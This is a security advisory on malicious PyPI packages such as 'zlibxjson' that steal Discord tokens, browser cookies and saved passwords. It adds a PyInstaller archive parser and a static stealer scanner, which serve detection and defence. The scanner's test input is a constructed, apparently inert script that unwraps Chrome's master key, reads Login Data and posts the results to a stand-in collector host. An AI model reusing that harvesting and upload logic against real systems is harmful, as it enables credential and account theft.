Malicious PyPI Packages Expose User Credentials


The FortiGuard Labs team has uncovered a series of malicious packages lurking within the Python Package Index (PyPI), the official repository for Python software packages. These malicious packages, including the recently discovered “zlibxjson” version 8.2, pose a grave threat to users, potentially leading to the theft of sensitive information like Discord tokens, browser cookies, and stored passwords.

The packages do not exploit a flaw in PyPI itself; they are uploaded like any other project and rely on a developer installing them in the belief that they are legitimate. Once installed, the embedded code can quietly harvest data from the victim's system, including login credentials and the billing details attached to the Discord account, and send it to attacker-controlled servers.

The package contains a URL from which it downloads several files, including an executable packed with PyInstaller. When run, the .exe unpacks a number of .pyc files, which the analysts decompiled back into Python source. Among the many files recovered, three stood out as clearly malicious:
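Recognising the PyInstaller archive and listing what it carries is the first step of the triage described above. The following is an added example, not code from the article or from FortiGuard: it locates the archive cookie, walks the table of contents and inflates an entry. It assumes the PyInstaller 2.1+ CArchive layout (88-byte cookie, 18-byte entry header) as implemented by PyInstaller's own writer and bootloader and by the pyinstxtractor tool; the sample executable and file names are constructed for the demonstration.

```python
import struct
import zlib

# Layout of a PyInstaller CArchive with the 2.1+ cookie, as written by PyInstaller's
# CArchiveWriter and read by its bootloader and by pyinstxtractor. This layout is an
# assumption of the example; the article only says the .exe was "packed with PyInstaller".
MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIIi64s"   # magic, package length, TOC offset, TOC length, Python version, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)   # 88 bytes
ENTRY_FMT = "!iIIIBc"       # entry length, data offset, compressed length, uncompressed length, compressed flag, type code
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)     # 18 bytes
TYPE_NAMES = {b"s": "script", b"m": "module", b"M": "package", b"z": "PYZ archive",
              b"b": "binary", b"x": "data", b"o": "option", b"d": "dependency"}


def find_archive(blob: bytes):
    """Locate the CArchive inside an executable. Returns (package_start, cookie) or None.

    The cookie is the last thing in the package, so search for the magic from the end:
    the bootloader code itself contains the same eight bytes (it searches for them too).
    """
    cookie_pos = blob.rfind(MAGIC)
    if cookie_pos < 0 or cookie_pos + COOKIE_SIZE > len(blob):
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FMT, blob[cookie_pos:cookie_pos + COOKIE_SIZE])
    # pkg_len covers data + TOC + cookie, so the package starts that far before the cookie's end.
    start = cookie_pos + COOKIE_SIZE - pkg_len
    if start < 0 or toc_off + toc_len > pkg_len:
        return None   # truncated or damaged archive
    return start, {"toc_off": toc_off, "toc_len": toc_len, "pyver": pyver,
                   "pylib": pylib.rstrip(b"\0").decode("ascii", "replace")}


def list_entries(blob: bytes):
    """Parse the table of contents; one dict per embedded file."""
    found = find_archive(blob)
    if found is None:
        return []
    start, cookie = found
    pos = start + cookie["toc_off"]
    end = pos + cookie["toc_len"]
    entries = []
    while pos + ENTRY_SIZE <= end:
        entry_len, data_off, clen, ulen, cflag, typ = struct.unpack(ENTRY_FMT, blob[pos:pos + ENTRY_SIZE])
        if entry_len < ENTRY_SIZE:
            break   # corrupt TOC; stop rather than loop forever
        name = blob[pos + ENTRY_SIZE:pos + entry_len].rstrip(b"\0").decode("utf-8", "replace")
        entries.append({"name": name, "type": TYPE_NAMES.get(typ, typ.decode("latin-1")),
                        "offset": start + data_off, "compressed": bool(cflag),
                        "clen": clen, "ulen": ulen})
        pos += entry_len
    return entries


def extract_entry(blob: bytes, entry: dict) -> bytes:
    """Return one entry's bytes, inflated when the TOC marks it compressed."""
    raw = blob[entry["offset"]:entry["offset"] + entry["clen"]]
    return zlib.decompress(raw) if entry["compressed"] else raw


def build_sample_exe(files):
    """Constructed test input: a fake PE stub (with a decoy copy of the magic, as a real
    bootloader has) followed by a CArchive holding `files` = [(name, type_code, payload)]."""
    data, toc = b"", b""
    for name, typ, payload in files:
        comp = zlib.compress(payload)
        name_b = name.encode() + b"\0"
        toc += struct.pack(ENTRY_FMT, ENTRY_SIZE + len(name_b), len(data), len(comp), len(payload), 1, typ) + name_b
        data += comp
    pkg_len = len(data) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), 39, b"python39.dll")
    return b"MZ" + b"\0" * 62 + MAGIC + b"\0" * 128 + data + toc + cookie


# Constructed sample; the entry names only mirror the article's file names.
SAMPLE_EXE = build_sample_exe([
    ("pyimod01_archive", b"m", b"# constructed frozen bootstrap module\n"),
    ("discord_token_grabber", b"s", b"import os\nprint('constructed sample script')\n"),
    ("PYZ-00.pyz", b"z", b"PYZ\0constructed payload"),
])

if __name__ == "__main__":
    for e in list_entries(SAMPLE_EXE):
        print(f"{e['type']:<12} {e['name']:<24} {e['ulen']:>5} bytes  compressed={e['compressed']}")
```

On a real sample the entries of type script are marshalled code objects without a .pyc header; pyinstxtractor adds that header (using the Python version from the cookie) before a decompiler is run over them, which is the step that yields the three scripts discussed below.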

1. Discord_token_grabber.py

This script is designed to steal sensitive information from Discord users, sending it to an external server controlled by the attacker. Key malicious activities include:

  • Token Extraction: The script searches the local machine for Discord tokens, which are bearer credentials for Discord's API: whoever holds one is the account, with no password or second factor asked for. This gives the attacker full access to the victim's Discord account.
  • Decryption of Stored Data: It decrypts the stored tokens (and any passwords it finds) with the master key kept in the client's Local State file. On Windows that key is protected by DPAPI and can only be unwrapped under the victim's own account, which is no obstacle to malware already running as that user.
  • Data Exfiltration: The extracted tokens and user information, including user profiles and billing details, are sent to the attacker's server.
  • Retry Logic: The script retries failed lookups and uploads rather than giving up, so a transient error does not stop the theft. This is robustness within a single run, not persistence across reboots.

2. get_cookies.py

This file engages in critical malicious activities, including:

  • Cookie Theft: It steals cookies from browsers such as Chrome, Firefox, Brave, and Opera. Cookies carry live session tokens, so a stolen one lets the attacker act as the logged-in victim without the password and, on most sites, without triggering MFA.
  • Decryption of Stored Data: For the Chromium-based browsers it decrypts the cookie values with the browser's master key (Firefox keeps its cookies unencrypted in cookies.sqlite, so none is needed there).
  • Staging for Exfiltration: The decrypted cookies are written to a file (cookies.txt), a staging step that makes the intent to collect and transfer them plain.

3. password_grabber.py

This script targets saved passwords from web browsers such as Google Chrome and Microsoft Edge. Detailed malicious actions include:

  • Unauthorized Access: The script copies the browsers' Login Data SQLite databases (the live file is locked while the browser runs) and reads the encrypted password column.
  • Decryption of Data: It decrypts the extracted passwords with the browser's encryption key and stores the results in a dictionary, ready for exfiltration.
  • Anti-Forensics: It deletes the copied database files once the data has been extracted, leaving fewer traces on disk.
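The three scripts share one pattern: they name a credential store (Login Data, Cookies, Local State, Discord's leveldb), unwrap the store's master key, and move the result off the machine. That pattern can be checked for statically in any decompiled or suspicious Python source. The following scanner is an added example, not FortiGuard's tooling or anything from the package; its indicator lists are a starting point chosen for this example, and both input scripts are constructed (the stealer-shaped one is inert: `aes_gcm_decrypt` is never defined and the collector host does not resolve).

```python
import ast
import re

# Indicators for the three behaviours the article describes: touching browser/Discord
# credential stores, unwrapping the master key, and sending data out. The lists are
# this example's own starting point, not indicators published by FortiGuard.
STRING_INDICATORS = {
    "credential_store": [r"Login Data", r"\bCookies\b", r"Local State", r"User Data",
                         r"leveldb", r"\.ldb\b", r"discord"],
    "key_decryption": [r"os_crypt", r"encrypted_key", r"DPAPI"],
    "network": [r"https?://"],
}
IMPORT_INDICATORS = {
    "key_decryption": {"win32crypt", "Crypto.Cipher", "Cryptodome.Cipher"},
    "network": {"requests", "urllib.request", "http.client", "socket"},
}
CALL_INDICATORS = {
    "key_decryption": {"CryptUnprotectData", "AES.new"},
    "network": {"requests.post", "requests.get", "urlopen", "urlretrieve", "sendall"},
}


def _dotted_name(node):
    """'requests.post' for the call target `requests.post(...)`; None for anything fancier."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(src: str) -> dict:
    """Static scan of one Python source file. Returns per-category hits and a verdict."""
    hits = {cat: set() for cat in ("credential_store", "key_decryption", "network")}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for cat, patterns in STRING_INDICATORS.items():
                for pat in patterns:
                    if re.search(pat, node.value, re.IGNORECASE):
                        hits[cat].add(f"str:{pat}")
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            modules = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for mod in modules:
                for cat, names in IMPORT_INDICATORS.items():
                    if any(mod == n or mod.startswith(n + ".") for n in names):
                        hits[cat].add(f"import:{mod}")
        elif isinstance(node, ast.Call):
            target = _dotted_name(node.func)
            if target:
                for cat, names in CALL_INDICATORS.items():
                    if any(target == n or target.endswith("." + n) for n in names):
                        hits[cat].add(f"call:{target}")
    # A credential store plus key unwrapping is the stealer signature; network
    # activity alone is ordinary, so it only raises the verdict, never triggers it.
    if hits["credential_store"] and hits["key_decryption"]:
        verdict = "infostealer: exfiltrates over network" if hits["network"] else "infostealer: stages credentials locally"
    elif hits["credential_store"] or hits["key_decryption"]:
        verdict = "suspicious: review manually"
    else:
        verdict = "no stealer indicators"
    return {"verdict": verdict, "hits": {cat: sorted(v) for cat, v in hits.items()}}


# Constructed sample in the shape of the password grabber the article describes.
# It is inert: aes_gcm_decrypt is never defined, and the collector host does not resolve.
STEALER_SOURCE = '''
import os, json, base64, shutil, sqlite3
import requests
import win32crypt
from Crypto.Cipher import AES

USER_DATA = os.path.join(os.environ["LOCALAPPDATA"], "Google", "Chrome", "User Data")

def master_key():
    state = json.load(open(os.path.join(USER_DATA, "Local State")))
    wrapped = base64.b64decode(state["os_crypt"]["encrypted_key"])[5:]
    return win32crypt.CryptUnprotectData(wrapped, None, None, None, 0)[1]

def harvest():
    shutil.copy2(os.path.join(USER_DATA, "Default", "Login Data"), "tmp.db")
    rows = sqlite3.connect("tmp.db").execute("SELECT origin_url, username_value, password_value FROM logins")
    loot = {url: (user, aes_gcm_decrypt(master_key(), blob)) for url, user, blob in rows}
    os.remove("tmp.db")
    requests.post("http://collector.example.invalid/upload", json=loot)
'''

# Constructed benign script: also uses sqlite3 and posts data, but touches no credential store.
BENIGN_SOURCE = '''
import sqlite3, requests

def sync():
    rows = sqlite3.connect("inventory.db").execute("SELECT sku, qty FROM stock").fetchall()
    requests.post("https://api.example.invalid/inventory", json=rows)
'''

if __name__ == "__main__":
    for label, src in (("stealer", STEALER_SOURCE), ("benign", BENIGN_SOURCE)):
        print(label, scan_source(src))
```

The verdict deliberately requires both a credential-store reference and key unwrapping before calling anything a stealer: plenty of legitimate code imports `requests` and opens SQLite databases, and a scanner that fires on those alone is ignored within a day. Run it over the scripts pyinstxtractor and a decompiler produce from a packed sample, and over anything `pip download` fetches before it is installed.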

To contain the risk, users who installed any of these packages should remove them immediately (pip uninstall the package in every environment it was installed into) and change the passwords of any accounts that may have been exposed. Stolen tokens and session cookies stay valid until the sessions themselves are revoked, so also log out all devices in Discord and in the affected browser accounts rather than relying on a password change alone. Organizations should review their dependency lists and lockfiles for the named packages and make sure they install only from trusted, verified sources.
